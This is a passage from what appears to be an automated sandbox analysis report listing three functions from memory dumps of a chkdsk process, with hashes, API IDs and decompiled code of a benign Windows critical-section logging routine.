                    Function 0097F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00978D14,?), ref: 0097F6FB
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: fe5e05e1daf93e60fd9f5a62274f82f312c0c9ce611fffd9a8d84ed91528cd18
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: 11D05E626503092AE610BAA49C13F2632CC6B44B00F4A4064FA48A63C3E950E4014165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 053F967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 43234b756b26650c74038b38dcf0dbcfca1c13e0838c5ce579dc08f45d4212e0
                    • Instruction ID: 444177b2eeefec498c82d4b4b547090d12bb8b07356422b7c56220e6a154f514
                    • Opcode Fuzzy Hash: 43234b756b26650c74038b38dcf0dbcfca1c13e0838c5ce579dc08f45d4212e0
                    • Instruction Fuzzy Hash: 6CB09B72D054C5C5D611D7A14708B277A117BD0751F66C062D2020645A47B8C095F6B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0544FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E0544FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E053FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05445720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05445720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x0544fdda
                    0x0544fde2
                    0x0544fde5
                    0x0544fdec
                    0x0544fdfa
                    0x0544fdff
                    0x0544fe0a
                    0x0544fe0f
                    0x0544fe17
                    0x0544fe1e
                    0x0544fe19
                    0x0544fe19
                    0x0544fe19
                    0x0544fe20
                    0x0544fe21
                    0x0544fe22
                    0x0544fe25
                    0x0544fe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0544FDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0544FE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0544FE01
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 354feeccfafbaa4e9a35eac87c44809d597df7d6ad7adc91df1265421a6f7b18
                    • Instruction ID: e3ca9cf00913cc9aeb95dbb4bac1299b517dd30a3e3316f07a7774bc24c9bcdc
                    • Opcode Fuzzy Hash: 354feeccfafbaa4e9a35eac87c44809d597df7d6ad7adc91df1265421a6f7b18
                    • Instruction Fuzzy Hash: 44F0F636284201BFEB201A45DC06FA3BB5AEB44731F244315F628566E1DA62F8209BF0
                    Uniqueness

                    Uniqueness Score: -1.00%